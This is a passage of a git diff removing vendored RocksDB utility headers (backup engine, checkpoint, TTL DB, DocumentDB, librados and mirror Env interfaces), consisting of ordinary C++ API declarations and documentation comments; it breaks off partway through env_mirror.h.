-      BackupID backup_id, const std::string& db_dir, const std::string& wal_dir,
-      const RestoreOptions& restore_options = RestoreOptions()) = 0;
-
-  // See the corresponding doc in BackupEngine
-  virtual Status RestoreDBFromLatestBackup(
-      const std::string& db_dir, const std::string& wal_dir,
-      const RestoreOptions& restore_options = RestoreOptions()) = 0;
-
-  // checks that each file exists and that the size of the file matches our
-  // expectations. it does not check file checksum.
-  //
-  // If this BackupEngine created the backup, it compares the files' current
-  // sizes against the number of bytes written to them during creation.
-  // Otherwise, it compares the files' current sizes against their sizes when
-  // the BackupEngine was opened.
-  //
-  // Returns Status::OK() if all checks are good
-  virtual Status VerifyBackup(BackupID backup_id) = 0;
-};
-
-// A backup engine for creating new backups.
-class BackupEngine {
- public:
-  virtual ~BackupEngine() {}
-
-  // BackupableDBOptions have to be the same as the ones used in previous
-  // BackupEngines for the same backup directory.
-  static Status Open(Env* db_env,
-                     const BackupableDBOptions& options,
-                     BackupEngine** backup_engine_ptr);
-
-  // same as CreateNewBackup, but stores extra application metadata
-  // Flush will always trigger if 2PC is enabled.
-  virtual Status CreateNewBackupWithMetadata(
-      DB* db, const std::string& app_metadata, bool flush_before_backup = false,
-      std::function<void()> progress_callback = []() {}) = 0;
-
-  // Captures the state of the database in the latest backup
-  // NOT a thread safe call
-  // Flush will always trigger if 2PC is enabled.
-  virtual Status CreateNewBackup(DB* db, bool flush_before_backup = false,
-                                 std::function<void()> progress_callback =
-                                     []() {}) {
-    return CreateNewBackupWithMetadata(db, "", flush_before_backup,
-                                       progress_callback);
-  }
-
-  // deletes old backups, keeping latest num_backups_to_keep alive
-  virtual Status PurgeOldBackups(uint32_t num_backups_to_keep) = 0;
-
-  // deletes a specific backup
-  virtual Status DeleteBackup(BackupID backup_id) = 0;
-
-  // Call this from another thread if you want to stop the backup
-  // that is currently happening. It will return immediatelly, will
-  // not wait for the backup to stop.
-  // The backup will stop ASAP and the call to CreateNewBackup will
-  // return Status::Incomplete(). It will not clean up after itself, but
-  // the state will remain consistent. The state will be cleaned up
-  // next time you create BackupableDB or RestoreBackupableDB.
-  virtual void StopBackup() = 0;
-
-  // Returns info about backups in backup_info
-  virtual void GetBackupInfo(std::vector<BackupInfo>* backup_info) = 0;
-
-  // Returns info about corrupt backups in corrupt_backups
-  virtual void GetCorruptedBackups(
-      std::vector<BackupID>* corrupt_backup_ids) = 0;
-
-  // restore from backup with backup_id
-  // IMPORTANT -- if options_.share_table_files == true,
-  // options_.share_files_with_checksum == false, you restore DB from some
-  // backup that is not the latest, and you start creating new backups from the
-  // new DB, they will probably fail.
-  //
-  // Example: Let's say you have backups 1, 2, 3, 4, 5 and you restore 3.
-  // If you add new data to the DB and try creating a new backup now, the
-  // database will diverge from backups 4 and 5 and the new backup will fail.
-  // If you want to create new backup, you will first have to delete backups 4
-  // and 5.
-  virtual Status RestoreDBFromBackup(
-      BackupID backup_id, const std::string& db_dir, const std::string& wal_dir,
-      const RestoreOptions& restore_options = RestoreOptions()) = 0;
-
-  // restore from the latest backup
-  virtual Status RestoreDBFromLatestBackup(
-      const std::string& db_dir, const std::string& wal_dir,
-      const RestoreOptions& restore_options = RestoreOptions()) = 0;
-
-  // checks that each file exists and that the size of the file matches our
-  // expectations. it does not check file checksum.
-  // Returns Status::OK() if all checks are good
-  virtual Status VerifyBackup(BackupID backup_id) = 0;
-
-  // Will delete all the files we don't need anymore
-  // It will do the full scan of the files/ directory and delete all the
-  // files that are not referenced.
-  virtual Status GarbageCollect() = 0;
-};
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/checkpoint.h b/thirdparty/rocksdb/include/rocksdb/utilities/checkpoint.h
deleted file mode 100644
index aa0a394..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/checkpoint.h
+++ /dev/null
@@ -1,43 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// A checkpoint is an openable snapshot of a database at a point in time.
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <string>
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-class DB;
-
-class Checkpoint {
- public:
-  // Creates a Checkpoint object to be used for creating openable snapshots
-  static Status Create(DB* db, Checkpoint** checkpoint_ptr);
-
-  // Builds an openable snapshot of RocksDB on the same disk, which
-  // accepts an output directory on the same disk, and under the directory
-  // (1) hard-linked SST files pointing to existing live SST files
-  // SST files will be copied if output directory is on a different filesystem
-  // (2) a copied manifest files and other files
-  // The directory should not already exist and will be created by this API.
-  // The directory will be an absolute path
-  // log_size_for_flush: if the total log file size is equal or larger than
-  // this value, then a flush is triggered for all the column families. The
-  // default value is 0, which means flush is always triggered. If you move
-  // away from the default, the checkpoint may not contain up-to-date data
-  // if WAL writing is not always enabled.
-  // Flush will always trigger if it is 2PC.
-  virtual Status CreateCheckpoint(const std::string& checkpoint_dir,
-                                  uint64_t log_size_for_flush = 0);
-
-  virtual ~Checkpoint() {}
-};
-
-}  // namespace rocksdb
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/convenience.h b/thirdparty/rocksdb/include/rocksdb/utilities/convenience.h
deleted file mode 100644
index f61afd6..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/convenience.h
+++ /dev/null
@@ -1,10 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-// This file was moved to rocksdb/convenience.h"
-
-#include "rocksdb/convenience.h"
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/date_tiered_db.h b/thirdparty/rocksdb/include/rocksdb/utilities/date_tiered_db.h
deleted file mode 100644
index f259b05..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/date_tiered_db.h
+++ /dev/null
@@ -1,108 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <map>
-#include <string>
-#include <vector>
-
-#include "rocksdb/db.h"
-
-namespace rocksdb {
-
-// Date tiered database is a wrapper of DB that implements
-// a simplified DateTieredCompactionStrategy by using multiple column famillies
-// as time windows.
-//
-// DateTieredDB provides an interface similar to DB, but it assumes that user
-// provides keys with last 8 bytes encoded as timestamp in seconds. DateTieredDB
-// is assigned with a TTL to declare when data should be deleted.
-//
-// DateTieredDB hides column families layer from standard RocksDB instance. It
-// uses multiple column families to manage time series data, each containing a
-// specific range of time. Column families are named by its maximum possible
-// timestamp. A column family is created automatically when data newer than
-// latest timestamp of all existing column families. The time range of a column
-// family is configurable by `column_family_interval`. By doing this, we
-// guarantee that compaction will only happen in a column family.
-//
-// DateTieredDB is assigned with a TTL. When all data in a column family are
-// expired (CF_Timestamp <= CUR_Timestamp - TTL), we directly drop the whole
-// column family.
-//
-// TODO(jhli): This is only a simplified version of DTCS. In a complete DTCS,
-// time windows can be merged over time, so that older time windows will have
-// larger time range. Also, compaction are executed only for adjacent SST files
-// to guarantee there is no time overlap between SST files.
-
-class DateTieredDB {
- public:
-  // Open a DateTieredDB whose name is `dbname`.
-  // Similar to DB::Open(), created database object is stored in dbptr.
-  //
-  // Two parameters can be configured: `ttl` to specify the length of time that
-  // keys should exist in the database, and `column_family_interval` to specify
-  // the time range of a column family interval.
-  //
-  // Open a read only database if read only is set as true.
-  // TODO(jhli): Should use an option object that includes ttl and
-  // column_family_interval.
-  static Status Open(const Options& options, const std::string& dbname,
-                     DateTieredDB** dbptr, int64_t ttl,
-                     int64_t column_family_interval, bool read_only = false);
-
-  explicit DateTieredDB() {}
-
-  virtual ~DateTieredDB() {}
-
-  // Wrapper for Put method. Similar to DB::Put(), but column family to be
-  // inserted is decided by the timestamp in keys, i.e. the last 8 bytes of user
-  // key. If key is already obsolete, it will not be inserted.
-  //
-  // When client put a key value pair in DateTieredDB, it assumes last 8 bytes
-  // of keys are encoded as timestamp. Timestamp is a 64-bit signed integer
-  // encoded as the number of seconds since 1970-01-01 00:00:00 (UTC) (Same as
-  // Env::GetCurrentTime()). Timestamp should be encoded in big endian.
-  virtual Status Put(const WriteOptions& options, const Slice& key,
-                     const Slice& val) = 0;
-
-  // Wrapper for Get method. Similar to DB::Get() but column family is decided
-  // by timestamp in keys. If key is already obsolete, it will not be found.
-  virtual Status Get(const ReadOptions& options, const Slice& key,
-                     std::string* value) = 0;
-
-  // Wrapper for Delete method. Similar to DB::Delete() but column family is
-  // decided by timestamp in keys. If key is already obsolete, return NotFound
-  // status.
-  virtual Status Delete(const WriteOptions& options, const Slice& key) = 0;
-
-  // Wrapper for KeyMayExist method. Similar to DB::KeyMayExist() but column
-  // family is decided by timestamp in keys. Return false when key is already
-  // obsolete.
-  virtual bool KeyMayExist(const ReadOptions& options, const Slice& key,
-                           std::string* value, bool* value_found = nullptr) = 0;
-
-  // Wrapper for Merge method. Similar to DB::Merge() but column family is
-  // decided by timestamp in keys.
-  virtual Status Merge(const WriteOptions& options, const Slice& key,
-                       const Slice& value) = 0;
-
-  // Create an iterator that hides low level details. This iterator internally
-  // merge results from all active time series column families. Note that
-  // column families are not deleted until all data are obsolete, so this
-  // iterator can possibly access obsolete key value pairs.
-  virtual Iterator* NewIterator(const ReadOptions& opts) = 0;
-
-  // Explicitly drop column families in which all keys are obsolete. This
-  // process is also inplicitly done in Put() operation.
-  virtual Status DropObsoleteColumnFamilies() = 0;
-
-  static const uint64_t kTSLength = sizeof(int64_t);  // size of timestamp
-};
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/db_ttl.h b/thirdparty/rocksdb/include/rocksdb/utilities/db_ttl.h
deleted file mode 100644
index 7c9c0cc..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/db_ttl.h
+++ /dev/null
@@ -1,68 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <string>
-#include <vector>
-
-#include "rocksdb/utilities/stackable_db.h"
-#include "rocksdb/db.h"
-
-namespace rocksdb {
-
-// Database with TTL support.
-//
-// USE-CASES:
-// This API should be used to open the db when key-values inserted are
-//  meant to be removed from the db in a non-strict 'ttl' amount of time
-//  Therefore, this guarantees that key-values inserted will remain in the
-//  db for >= ttl amount of time and the db will make efforts to remove the
-//  key-values as soon as possible after ttl seconds of their insertion.
-//
-// BEHAVIOUR:
-// TTL is accepted in seconds
-// (int32_t)Timestamp(creation) is suffixed to values in Put internally
-// Expired TTL values deleted in compaction only:(Timestamp+ttl<time_now)
-// Get/Iterator may return expired entries(compaction not run on them yet)
-// Different TTL may be used during different Opens
-// Example: Open1 at t=0 with ttl=4 and insert k1,k2, close at t=2
-//          Open2 at t=3 with ttl=5. Now k1,k2 should be deleted at t>=5
-// read_only=true opens in the usual read-only mode. Compactions will not be
-//  triggered(neither manual nor automatic), so no expired entries removed
-//
-// CONSTRAINTS:
-// Not specifying/passing or non-positive TTL behaves like TTL = infinity
-//
-// !!!WARNING!!!:
-// Calling DB::Open directly to re-open a db created by this API will get
-//  corrupt values(timestamp suffixed) and no ttl effect will be there
-//  during the second Open, so use this API consistently to open the db
-// Be careful when passing ttl with a small positive value because the
-//  whole database may be deleted in a small amount of time
-
-class DBWithTTL : public StackableDB {
- public:
-  virtual Status CreateColumnFamilyWithTtl(
-      const ColumnFamilyOptions& options, const std::string& column_family_name,
-      ColumnFamilyHandle** handle, int ttl) = 0;
-
-  static Status Open(const Options& options, const std::string& dbname,
-                     DBWithTTL** dbptr, int32_t ttl = 0,
-                     bool read_only = false);
-
-  static Status Open(const DBOptions& db_options, const std::string& dbname,
-                     const std::vector<ColumnFamilyDescriptor>& column_families,
-                     std::vector<ColumnFamilyHandle*>* handles,
-                     DBWithTTL** dbptr, std::vector<int32_t> ttls,
-                     bool read_only = false);
-
- protected:
-  explicit DBWithTTL(DB* db) : StackableDB(db) {}
-};
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/debug.h b/thirdparty/rocksdb/include/rocksdb/utilities/debug.h
deleted file mode 100644
index bc5b9bf..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/debug.h
+++ /dev/null
@@ -1,41 +0,0 @@
-//  Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/db.h"
-#include "rocksdb/types.h"
-
-namespace rocksdb {
-
-// Data associated with a particular version of a key. A database may internally
-// store multiple versions of a same user key due to snapshots, compaction not
-// happening yet, etc.
-struct KeyVersion {
-  KeyVersion() : user_key(""), value(""), sequence(0), type(0) {}
-
-  KeyVersion(const std::string& _user_key, const std::string& _value,
-             SequenceNumber _sequence, int _type)
-      : user_key(_user_key), value(_value), sequence(_sequence), type(_type) {}
-
-  std::string user_key;
-  std::string value;
-  SequenceNumber sequence;
-  // TODO(ajkr): we should provide a helper function that converts the int to a
-  // string describing the type for easier debugging.
-  int type;
-};
-
-// Returns listing of all versions of keys in the provided user key range.
-// The range is inclusive-inclusive, i.e., [`begin_key`, `end_key`].
-// The result is inserted into the provided vector, `key_versions`.
-Status GetAllKeyVersions(DB* db, Slice begin_key, Slice end_key,
-                         std::vector<KeyVersion>* key_versions);
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/document_db.h b/thirdparty/rocksdb/include/rocksdb/utilities/document_db.h
deleted file mode 100644
index 3668a50..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/document_db.h
+++ /dev/null
@@ -1,149 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <string>
-#include <vector>
-
-#include "rocksdb/utilities/stackable_db.h"
-#include "rocksdb/utilities/json_document.h"
-#include "rocksdb/db.h"
-
-namespace rocksdb {
-
-// IMPORTANT: DocumentDB is a work in progress. It is unstable and we might
-// change the API without warning. Talk to RocksDB team before using this in
-// production ;)
-
-// DocumentDB is a layer on top of RocksDB that provides a very simple JSON API.
-// When creating a DB, you specify a list of indexes you want to keep on your
-// data. You can insert a JSON document to the DB, which is automatically
-// indexed. Every document added to the DB needs to have "_id" field which is
-// automatically indexed and is an unique primary key. All other indexes are
-// non-unique.
-
-// NOTE: field names in the JSON are NOT allowed to start with '$' or
-// contain '.'. We don't currently enforce that rule, but will start behaving
-// badly.
-
-// Cursor is what you get as a result of executing query. To get all
-// results from a query, call Next() on a Cursor while  Valid() returns true
-class Cursor {
- public:
-  Cursor() = default;
-  virtual ~Cursor() {}
-
-  virtual bool Valid() const = 0;
-  virtual void Next() = 0;
-  // Lifecycle of the returned JSONDocument is until the next Next() call
-  virtual const JSONDocument& document() const = 0;
-  virtual Status status() const = 0;
-
- private:
-  // No copying allowed
-  Cursor(const Cursor&);
-  void operator=(const Cursor&);
-};
-
-struct DocumentDBOptions {
-  int background_threads = 4;
-  uint64_t memtable_size = 128 * 1024 * 1024;    // 128 MB
-  uint64_t cache_size = 1 * 1024 * 1024 * 1024;  // 1 GB
-};
-
-// TODO(icanadi) Add `JSONDocument* info` parameter to all calls that can be
-// used by the caller to get more information about the call execution (number
-// of dropped records, number of updated records, etc.)
-class DocumentDB : public StackableDB {
- public:
-  struct IndexDescriptor {
-    // Currently, you can only define an index on a single field. To specify an
-    // index on a field X, set index description to JSON "{X: 1}"
-    // Currently the value needs to be 1, which means ascending.
-    // In the future, we plan to also support indexes on multiple keys, where
-    // you could mix ascending sorting (1) with descending sorting indexes (-1)
-    JSONDocument* description;
-    std::string name;
-  };
-
-  // Open DocumentDB with specified indexes. The list of indexes has to be
-  // complete, i.e. include all indexes present in the DB, except the primary
-  // key index.
-  // Otherwise, Open() will return an error
-  static Status Open(const DocumentDBOptions& options, const std::string& name,
-                     const std::vector<IndexDescriptor>& indexes,
-                     DocumentDB** db, bool read_only = false);
-
-  explicit DocumentDB(DB* db) : StackableDB(db) {}
-
-  // Create a new index. It will stop all writes for the duration of the call.
-  // All current documents in the DB are scanned and corresponding index entries
-  // are created
-  virtual Status CreateIndex(const WriteOptions& write_options,
-                             const IndexDescriptor& index) = 0;
-
-  // Drop an index. Client is responsible to make sure that index is not being
-  // used by currently executing queries
-  virtual Status DropIndex(const std::string& name) = 0;
-
-  // Insert a document to the DB. The document needs to have a primary key "_id"
-  // which can either be a string or an integer. Otherwise the write will fail
-  // with InvalidArgument.
-  virtual Status Insert(const WriteOptions& options,
-                        const JSONDocument& document) = 0;
-
-  // Deletes all documents matching a filter atomically
-  virtual Status Remove(const ReadOptions& read_options,
-                        const WriteOptions& write_options,
-                        const JSONDocument& query) = 0;
-
-  // Does this sequence of operations:
-  // 1. Find all documents matching a filter
-  // 2. For all documents, atomically:
-  // 2.1. apply the update operators
-  // 2.2. update the secondary indexes
-  //
-  // Currently only $set update operator is supported.
-  // Syntax is: {$set: {key1: value1, key2: value2, etc...}}
-  // This operator will change a document's key1 field to value1, key2 to
-  // value2, etc. New values will be set even if a document didn't have an entry
-  // for the specified key.
-  //
-  // You can not change a primary key of a document.
-  //
-  // Update example: Update({id: {$gt: 5}, $index: id}, {$set: {enabled: true}})
-  virtual Status Update(const ReadOptions& read_options,
-                        const WriteOptions& write_options,
-                        const JSONDocument& filter,
-                        const JSONDocument& updates) = 0;
-
-  // query has to be an array in which every element is an operator. Currently
-  // only $filter operator is supported. Syntax of $filter operator is:
-  // {$filter: {key1: condition1, key2: condition2, etc.}} where conditions can
-  // be either:
-  // 1) a single value in which case the condition is equality condition, or
-  // 2) a defined operators, like {$gt: 4}, which will match all documents that
-  // have key greater than 4.
-  //
-  // Supported operators are:
-  // 1) $gt -- greater than
-  // 2) $gte -- greater than or equal
-  // 3) $lt -- less than
-  // 4) $lte -- less than or equal
-  // If you want the filter to use an index, you need to specify it like this:
-  // {$filter: {...(conditions)..., $index: index_name}}
-  //
-  // Example query:
-  // * [{$filter: {name: John, age: {$gte: 18}, $index: age}}]
-  // will return all Johns whose age is greater or equal to 18 and it will use
-  // index "age" to satisfy the query.
-  virtual Cursor* Query(const ReadOptions& read_options,
-                        const JSONDocument& query) = 0;
-};
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/env_librados.h b/thirdparty/rocksdb/include/rocksdb/utilities/env_librados.h
deleted file mode 100644
index 272365f..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/env_librados.h
+++ /dev/null
@@ -1,176 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#ifndef ROCKSDB_UTILITIES_ENV_LIBRADOS_H
-#define ROCKSDB_UTILITIES_ENV_LIBRADOS_H
-
-#include <memory>
-#include <string>
-
-#include "rocksdb/status.h"
-#include "rocksdb/utilities/env_mirror.h"
-
-#include <rados/librados.hpp>
-
-namespace rocksdb {
-class LibradosWritableFile;
-
-class EnvLibrados : public EnvWrapper {
- public:
-  // Create a brand new sequentially-readable file with the specified name.
-  // On success, stores a pointer to the new file in *result and returns OK.
-  // On failure stores nullptr in *result and returns non-OK.  If the file does
-  // not exist, returns a non-OK status.
-  //
-  // The returned file will only be accessed by one thread at a time.
-  Status NewSequentialFile(const std::string& fname,
-                           std::unique_ptr<SequentialFile>* result,
-                           const EnvOptions& options) override;
-
-  // Create a brand new random access read-only file with the
-  // specified name.  On success, stores a pointer to the new file in
-  // *result and returns OK.  On failure stores nullptr in *result and
-  // returns non-OK.  If the file does not exist, returns a non-OK
-  // status.
-  //
-  // The returned file may be concurrently accessed by multiple threads.
-  Status NewRandomAccessFile(const std::string& fname,
-                             std::unique_ptr<RandomAccessFile>* result,
-                             const EnvOptions& options) override;
-
-  // Create an object that writes to a new file with the specified
-  // name.  Deletes any existing file with the same name and creates a
-  // new file.  On success, stores a pointer to the new file in
-  // *result and returns OK.  On failure stores nullptr in *result and
-  // returns non-OK.
-  //
-  // The returned file will only be accessed by one thread at a time.
-  Status NewWritableFile(const std::string& fname,
-                         std::unique_ptr<WritableFile>* result,
-                         const EnvOptions& options) override;
-
-  // Reuse an existing file by renaming it and opening it as writable.
-  Status ReuseWritableFile(const std::string& fname,
-                           const std::string& old_fname,
-                           std::unique_ptr<WritableFile>* result,
-                           const EnvOptions& options) override;
-
-  // Create an object that represents a directory. Will fail if directory
-  // doesn't exist. If the directory exists, it will open the directory
-  // and create a new Directory object.
-  //
-  // On success, stores a pointer to the new Directory in
-  // *result and returns OK. On failure stores nullptr in *result and
-  // returns non-OK.
-  Status NewDirectory(const std::string& name,
-                      std::unique_ptr<Directory>* result) override;
-
-  // Returns OK if the named file exists.
-  //         NotFound if the named file does not exist,
-  //                  the calling process does not have permission to determine
-  //                  whether this file exists, or if the path is invalid.
-  //         IOError if an IO Error was encountered
-  Status FileExists(const std::string& fname) override;
-
-  // Store in *result the names of the children of the specified directory.
-  // The names are relative to "dir".
-  // Original contents of *results are dropped.
-  Status GetChildren(const std::string& dir, std::vector<std::string>* result);
-
-  // Delete the named file.
-  Status DeleteFile(const std::string& fname) override;
-
-  // Create the specified directory. Returns error if directory exists.
-  Status CreateDir(const std::string& dirname) override;
-
-  // Creates directory if missing. Return Ok if it exists, or successful in
-  // Creating.
-  Status CreateDirIfMissing(const std::string& dirname) override;
-
-  // Delete the specified directory.
-  Status DeleteDir(const std::string& dirname) override;
-
-  // Store the size of fname in *file_size.
-  Status GetFileSize(const std::string& fname, uint64_t* file_size) override;
-
-  // Store the last modification time of fname in *file_mtime.
-  Status GetFileModificationTime(const std::string& fname,
-                                 uint64_t* file_mtime) override;
-  // Rename file src to target.
-  Status RenameFile(const std::string& src, const std::string& target) override;
-  // Hard Link file src to target.
-  Status LinkFile(const std::string& src, const std::string& target) override;
-
-  // Lock the specified file.  Used to prevent concurrent access to
-  // the same db by multiple processes.  On failure, stores nullptr in
-  // *lock and returns non-OK.
-  //
-  // On success, stores a pointer to the object that represents the
-  // acquired lock in *lock and returns OK.  The caller should call
-  // UnlockFile(*lock) to release the lock.  If the process exits,
-  // the lock will be automatically released.
-  //
-  // If somebody else already holds the lock, finishes immediately
-  // with a failure.  I.e., this call does not wait for existing locks
-  // to go away.
-  //
-  // May create the named file if it does not already exist.
-  Status LockFile(const std::string& fname, FileLock** lock);
-
-  // Release the lock acquired by a previous successful call to LockFile.
-  // REQUIRES: lock was returned by a successful LockFile() call
-  // REQUIRES: lock has not already been unlocked.
-  Status UnlockFile(FileLock* lock);
-
-  // Get full directory name for this db.
-  Status GetAbsolutePath(const std::string& db_path, std::string* output_path);
-
-  // Generate unique id
-  std::string GenerateUniqueId();
-
-  // Get default EnvLibrados
-  static EnvLibrados* Default();
-
-  explicit EnvLibrados(const std::string& db_name,
-                       const std::string& config_path,
-                       const std::string& db_pool);
-
-  explicit EnvLibrados(
-      const std::string& client_name,  // first 3 parameters are
-                                       // for RADOS client init
-      const std::string& cluster_name, const uint64_t flags,
-      const std::string& db_name, const std::string& config_path,
-      const std::string& db_pool, const std::string& wal_dir,
-      const std::string& wal_pool, const uint64_t write_buffer_size);
-  ~EnvLibrados() { _rados.shutdown(); }
-
- private:
-  std::string _client_name;
-  std::string _cluster_name;
-  uint64_t _flags;
-  std::string _db_name;  // get from user, readable string; Also used as db_id
-                         // for db metadata
-  std::string _config_path;
-  librados::Rados _rados;  // RADOS client
-  std::string _db_pool_name;
-  librados::IoCtx _db_pool_ioctx;  // IoCtx for connecting db_pool
-  std::string _wal_dir;            // WAL dir path
-  std::string _wal_pool_name;
-  librados::IoCtx _wal_pool_ioctx;  // IoCtx for connecting wal_pool
-  uint64_t _write_buffer_size;      // WritableFile buffer max size
-
-  /* private function to communicate with rados */
-  std::string _CreateFid();
-  Status _GetFid(const std::string& fname, std::string& fid);
-  Status _GetFid(const std::string& fname, std::string& fid, int fid_len);
-  Status _RenameFid(const std::string& old_fname, const std::string& new_fname);
-  Status _AddFid(const std::string& fname, const std::string& fid);
-  Status _DelFid(const std::string& fname);
-  Status _GetSubFnames(const std::string& dirname,
-                       std::vector<std::string>* result);
-  librados::IoCtx* _GetIoctx(const std::string& prefix);
-  friend class LibradosWritableFile;
-};
-}
-#endif
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/env_mirror.h b/thirdparty/rocksdb/include/rocksdb/utilities/env_mirror.h
deleted file mode 100644
index ffd175a..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/env_mirror.h
+++ /dev/null
@@ -1,176 +0,0 @@
-// Copyright (c) 2015, Red Hat, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// MirrorEnv is an Env implementation that mirrors all file-related
-// operations to two backing Env's (provided at construction time).
-// Writes are mirrored.  For read operations, we do the read from both
-// backends and assert that the results match.
-//
-// This is useful when implementing a new Env and ensuring that the
-// semantics and behavior are correct (in that they match that of an
-// existing, stable Env, like the default POSIX one).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <iostream>
-#include <algorithm>
-#include <vector>
-#include "rocksdb/env.h"
-
-namespace rocksdb {
-
-class SequentialFileMirror;
-class RandomAccessFileMirror;
-class WritableFileMirror;
-
-class EnvMirror : public EnvWrapper {
-  Env* a_, *b_;
-  bool free_a_, free_b_;
-
- public:
-  EnvMirror(Env* a, Env* b, bool free_a=false, bool free_b=false)
-    : EnvWrapper(a),
-      a_(a),
-      b_(b),
-      free_a_(free_a),
-      free_b_(free_b) {}
-  ~EnvMirror() {
-    if (free_a_)
-      delete a_;
-    if (free_b_)
-      delete b_;
-  }
-
-  Status NewSequentialFile(const std::string& f, unique_ptr<SequentialFile>* r,
-                           const EnvOptions& options) override;
-  Status NewRandomAccessFile(const std::string& f,
-                             unique_ptr<RandomAccessFile>* r,
-                             const EnvOptions& options) override;
-  Status NewWritableFile(const std::string& f, unique_ptr<WritableFile>* r,
-                         const EnvOptions& options) override;
-  Status ReuseWritableFile(const std::string& fname,
-                           const std::string& old_fname,
-                           unique_ptr<WritableFile>* r,
-                           const EnvOptions& options) override;
-  virtual Status NewDirectory(const std::string& name,
-                              unique_ptr<Directory>* result) override {
-    unique_ptr<Directory> br;
-    Status as = a_->NewDirectory(name, result);
-    Status bs = b_->NewDirectory(name, &br);
-    assert(as == bs);
-    return as;
-  }
-  Status FileExists(const std::string& f) override {
-    Status as = a_->FileExists(f);
-    Status bs = b_->FileExists(f);
-    assert(as == bs);
-    return as;
-  }
-  Status GetChildren(const std::string& dir,
-                     std::vector<std::string>* r) override {
-    std::vector<std::string> ar, br;
-    Status as = a_->GetChildren(dir, &ar);
-    Status bs = b_->GetChildren(dir, &br);
-    assert(as == bs);
-    std::sort(ar.begin(), ar.end());
-    std::sort(br.begin(), br.end());
-    if (!as.ok() || ar != br) {
-      assert(0 == "getchildren results don't match");
-    }
-    *r = ar;
-    return as;
-  }
-  Status DeleteFile(const std::string& f) override {
-    Status as = a_->DeleteFile(f);
-    Status bs = b_->DeleteFile(f);
-    assert(as == bs);
-    return as;
-  }
-  Status CreateDir(const std::string& d) override {
-    Status as = a_->CreateDir(d);
-    Status bs = b_->CreateDir(d);
-    assert(as == bs);
-    return as;
-  }
-  Status CreateDirIfMissing(const std::string& d) override {
-    Status as = a_->CreateDirIfMissing(d);
-    Status bs = b_->CreateDirIfMissing(d);
-    assert(as == bs);
-    return as;
-  }
-  Status DeleteDir(const std::string& d) override {
-    Status as = a_->DeleteDir(d);
-    Status bs = b_->DeleteDir(d);
-    assert(as == bs);
-    return as;
-  }
-  Status GetFileSize(const std::string& f, uint64_t* s) override {
-    uint64_t asize, bsize;
-    Status as = a_->GetFileSize(f, &asize);
-    Status bs = b_->GetFileSize(f, &bsize);
-    assert(as == bs);
-    assert(!as.ok() || asize == bsize);
-    *s = asize;
-    return as;
-  }
-
-  Status GetFileModificationTime(const std::string& fname,
-                                 uint64_t* file_mtime) override {
-    uint64_t amtime, bmtime;
-    Status as = a_->GetFileModificationTime(fname, &amtime);
-    Status bs = b_->GetFileModificationTime(fname, &bmtime);
-    assert(as == bs);
-    assert(!as.ok() || amtime - bmtime < 10000 || bmtime - amtime < 10000);
-    *file_mtime = amtime;
-    return as;
-  }
-
-  Status RenameFile(const std::string& s, const std::string& t) override {
-    Status as = a_->RenameFile(s, t);
-    Status bs = b_->RenameFile(s, t);
-    assert(as == bs);
-    return as;
